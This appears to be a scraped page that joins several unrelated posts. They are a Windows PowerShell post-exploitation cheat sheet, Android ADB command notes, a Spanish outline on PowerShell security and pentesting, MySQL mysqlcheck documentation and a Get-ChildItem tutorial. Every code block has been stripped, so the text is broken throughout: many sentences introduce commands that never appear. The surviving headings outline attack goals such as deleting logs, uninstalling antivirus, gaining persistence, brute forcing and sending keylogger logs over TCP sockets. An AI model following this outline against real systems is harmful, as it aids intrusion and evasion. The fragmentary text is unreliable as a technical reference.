Windows Post Exploitation Cmdlets Execution (PowerShell)

Presence

This section focuses on information gathering about the victim host and the network that it’s attached to.

System

shows-all-current-environmental-variables-macos

WMI

Networking

Users

Configs

Finding important files

Files to pull

Remote system access

Software

Auto­Start directories


Persistance

This section focuses on gaining a foothold to re­gain, or re­obtain access to a system through means of authentication, backdoors, etc..

Download

Compress or expand ZIP archive

Reg command exit

Deleting logs

Uninstalling software „Antivirus“

Invasive or altering commands

ADB Shell Commands

The Android Debug Bridge (adb) provides a Unix shell that you can use to run a variety of commands on an emulator or connected device.

 

ADB Shell Commands

http://developer.android.com/intl/es/tools/help/shell.html


 

Issuing Shell Commands

You can use the shell command to issue commands, with or without entering the adb remote shell on the emulator/device. To issue a single command without entering a remote shell, use the shell command like this:

 

List of all attached device

 

Download a specified file from an device to your computer

 

Upload a specified file from your computer to an device

 

List directory contents

 

Change directory

 

Remove files or directories

 

Make directories

 

Create empty file

 

Current working directory location

 

Copy files and directories

 

Move or rename files

 

Starts (restarts) an emulator/device instance

 

Stops execution of an emulator/device instance

 

Prints kernel debugging messages to the screen

 

Show/manipulate routing, devices, policy routing and tunnels

 

Network statistics

 

Network connection tool

 

Test the connection and latency between two network connection

 

Using activity manager (am)

Activity manager (am) tool to perform various system actions, such as start an activity, force-stop a process, broadcast an intent, modify the device screen properties, and more. While in a shell, the syntax is:

Available activity manager commands:

Start an Activity specified by <INTENT>.

Start the Service specified by <INTENT>.

Kill all processes associated with <PACKAGE>

 

Using package manager (pm)

Within an adb shell, you can issue commands with the package manager (pm) tool to perform actions and queries on application packages installed on the device. While in a shell, the syntax is:

Available activity manager commands:

Prints all packages, optionally only those whose package name contains the text in <FILTER>.

Prints all known permission groups

Prints all known permissions, optionally only those in <GROUP>

Prints all features of the system

Prints all users on the system

Installs a package (specified by <PATH>) to the system

 

Taking a device screenshot

The screencap command is a shell utility for taking a screenshot of a device display. While in a shell, the syntax is:

 

Recording a device screen

The screenrecord command is a shell utility for recording the display of devices running Android 4.4 (API level 19) and higher. The utility records screen activity to an MPEG-4 file.

 

List of all the available shell programs

 

More commands

 

Mover un objeto en JavaScript usando el teclado

Mover un objeto en JavaScript usando el teclado

Herramienta de desarrollo console

 

Seguridad informática con PowerShell

Introducción

  • Confidencialidad

  • Integridad

  • Disponibilidad
  • Autenticación
  • No repudio

Seguridad física

  • Analizar el hardware de los equipos de la empresa

  • Ver dispositivos conectados (móviles, almacenamiento USB, etc.)


Seguridad lógica

  • Ver información sobre usuarios y grupos (usuario que ha iniciado sesión)

  • Crear usuarios y grupos (procedimiento de creación)

  • Analizar el software de los equipos de la empresa

  • Analizar los programas que están instalados en los equipos de la empresa y ver la relación que tienen con los procesos y servicios

  • Analizar los programas que están instalados en los equipos de la empresa y ver la relación que tienen con los procesos y servicios (también se pueden analizar hilos)

  • Ver las actualizaciones instaladas en el sistema

  • Procesos que se están ejecutando

  • Ruta de ejecución de los procesos

  • Procesos y usuarios

  • Procesos y conexiones de red

UDP

TCP

  • Servicios y conexiones de red

UDP

 

TCP

 


Antivirus

  • Analizar

  • Definiciones


Copias de seguridad

  • Realizar y restaurar copias de seguridad


Red

  • Escanear equipos

  • Monitorizar

  • Logs


Criptografía

  • Cifrar y descifrar

Cifrar

Descifrar


Forense

  • Analizar sistema de archivos (rutas, fechas, etc.)

  • Artefactos

  • Crear un fichero de volcado de memoria de un proceso


Pentesting

  • Fuerza bruta

Artefactos

Realizar conexiones TCP/UDP con Powershell

TCP (Transmission Control Protocol)

UDP (User Datagram Protocol)

Transfer keylogger log file between server and client (Sockets TCP)

Server


Client

 

mysqlcheck: A Table Maintenance Program

The mysqlcheck client performs table maintenance: It checks, repairs, optimizes, or analyzes tables.

Each table is locked and therefore unavailable to other sessions while it is being processed, although for check operations, the table is locked with a READ lock only (see Section 13.3.5, “LOCK TABLES and UNLOCK TABLES Syntax”, for more information about READ and WRITE locks). Table maintenance operations can be time-consuming, particularly for large tables. If you use the --databases or --all-databases option to process all tables in one or more databases, an invocation of mysqlcheck might take a long time. (This is also true formysql_upgrade because that program invokes mysqlcheck to check all tables and repair them if necessary.)

mysqlcheck is similar in function to myisamchk, but works differently. The main operational difference is thatmysqlcheck must be used when the mysqld server is running, whereas myisamchk should be used when it is not. The benefit of using mysqlcheck is that you do not have to stop the server to perform table maintenance.

mysqlcheck uses the SQL statements CHECK TABLE, REPAIR TABLE, ANALYZE TABLE, and OPTIMIZE TABLE in a convenient way for the user. It determines which statements to use for the operation you want to perform, and then sends the statements to the server to be executed. For details about which storage engines each statement works with, see the descriptions for those statements in Section 13.7.2, “Table Maintenance Statements”.

The MyISAM storage engine supports all four maintenance operations, so mysqlcheck can be used to perform any of them on MyISAM tables. Other storage engines do not necessarily support all operations. In such cases, an error message is displayed. For example, if test.t is a MEMORY table, an attempt to check it produces this result:

If mysqlcheck is unable to repair a table, see Section 2.19.4, “Rebuilding or Repairing Tables or Indexes” for manual table repair strategies. This will be the case, for example, for InnoDB tables, which can be checked withCHECK TABLE, but not repaired with REPAIR TABLE.

Caution

It is best to make a backup of a table before performing a table repair operation; under some circumstances the operation might cause data loss. Possible causes include but are not limited to file system errors.

There are three general ways to invoke mysqlcheck:

If you do not name any tables following db_name or if you use the --databases or --all-databases option, entire databases are checked.

mysqlcheck has a special feature compared to other client programs. The default behavior of checking tables (--check) can be changed by renaming the binary. If you want to have a tool that repairs tables by default, you should just make a copy of mysqlcheck named mysqlrepair, or make a symbolic link to mysqlcheck namedmysqlrepair. If you invoke mysqlrepair, it repairs tables.

The names shown in the following table can be used to change mysqlcheck default behavior.

Command Meaning
mysqlrepair The default option is --repair
mysqlanalyze The default option is --analyze
mysqloptimize The default option is --optimize

mysqlcheck supports the following options, which can be specified on the command line or in the [mysqlcheck]and [client] groups of an option file. For information about option files used by MySQL programs, seeSection 4.2.6, “Using Option Files”.

Table 4.4 mysqlcheck Options

Format Description Introduced
–all-databases Check all tables in all databases
–all-in-1 Execute a single statement for each database that names all the tables from that database
–analyze Analyze the tables
–auto-repair If a checked table is corrupted, automatically fix it
–character-sets-dir=path Directory where character sets are installed
–check Check the tables for errors
–check-only-changed Check only tables that have changed since the last check
–check-upgrade Invoke CHECK TABLE with the FOR UPGRADE option 5.0.19
–compress Compress all information sent between client and server
–databases Process all tables in the named databases
–debug[=debug_options] Write a debugging log
–default-character-set=charset_name Specify default character set
–defaults-extra-file=file_name Read option file in addition to usual option files
–defaults-file=file_name Read only named option file
–defaults-group-suffix=str Option group suffix value 5.0.10
–extended Check and repair tables
–fast Check only tables that have not been closed properly
–force Continue even if an SQL error occurs
–help Display help message and exit
–host=host_name Connect to MySQL server on given host
–medium-check Do a check that is faster than an –extended operation
–no-defaults Read no option files
–optimize Optimize the tables
–password[=password] Password to use when connecting to server
–pipe On Windows, connect to server using named pipe
–port=port_num TCP/IP port number to use for connection
–print-defaults Print defaults
–protocol=type Connection protocol to use
–quick The fastest method of checking
–repair Perform a repair that can fix almost anything except unique keys that are not unique
–shared-memory-base-name=name The name of shared memory to use for shared-memory connections
–silent Silent mode
–socket=path For connections to localhost, the Unix socket file to use
–ssl Enable SSL for connection
–ssl-ca=file_name Path of file that contains list of trusted SSL CAs
–ssl-capath=dir_name Path of directory that contains trusted SSL CA certificates in PEM format
–ssl-cert=file_name Path of file that contains X509 certificate in PEM format
–ssl-cipher=cipher_list List of permitted ciphers to use for SSL encryption
–ssl-key=file_name Path of file that contains X509 key in PEM format
–ssl-verify-server-cert Verify server Common Name value in its certificate against host name used when connecting to server 5.0.23
–tables Overrides the –databases or -B option
–use-frm For repair operations on MyISAM tables
–user=user_name, MySQL user name to use when connecting to server
–verbose Verbose mode
–version Display version information and exit

Replicating (and Extending) the DIR Command

In its basic form the Get-ChildItem cmdlet provides functionality similar to the dir command. For example, if you simply type Get-ChildItem at the Windows PowerShell prompt you’ll get back information about the objects in the current location:

 
That’s all well and good, but you can do a lot more with Get-ChildItem than simply list the items found in the current location. For example, in the output above you might have noticed that there wasn’t much to look at; that’s because the current location happened to be a folder that contained only a handful of subfolders. Because of that you might have found it a bit more useful if Get-ChildItem had returned not only the names of those subfolders but also the contents of those subfolders; that is, you might want a list of all the files and folders in the subfolders. No problem; just add the -recurse parameter:

 
Of course, you aren’t limited to working with only the current location; in fact, you aren’t limited to working with just files and folders. Would you like to see a list of all your environment variables? Then simply pass along the path to the environment variable “drive,” like so:

 
What about all the registry subkeys found in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall? Why not:

 
Note. Get-ChildItem cannot be used to retrieve information about the registry values contained within a subkey. For that you need to use the Get-ItemProperty cmdlet.
We could do this all day. For example, the -include and -exclude parameters make it easy to retrieve a specific set of items from a location. Suppose you want information about only the .txt and .log files found in the folder C:\Scripts? That’s easy:

 
As you can see, we ask for all the files (*.*) found in the folder C:\Scripts. We then tack on the -include parameter, specifying two file types: *.txt and *.log. (And separating the file types using a comma). What do we get back? We get back only .txt and .log files:

 
If we wanted to get back everything except .txt and .log files then we’d simply use the -exclude parameter instead; this parameter tells Windows PowerShell which items should not be included in the returned dataset. Here’s what the command looks like:

 
Give it a try and see what happens.
The information returned by Get-ChildItem can also be piped into the Sort-Object cmdlet, providing a way to sort the data by in some other format. Would you rather see files sorted by size (length) than by name? Then use this command:

 
Or, if you’d rather see the largest files listed first and the smallest files listed last, then add the -descending parameter: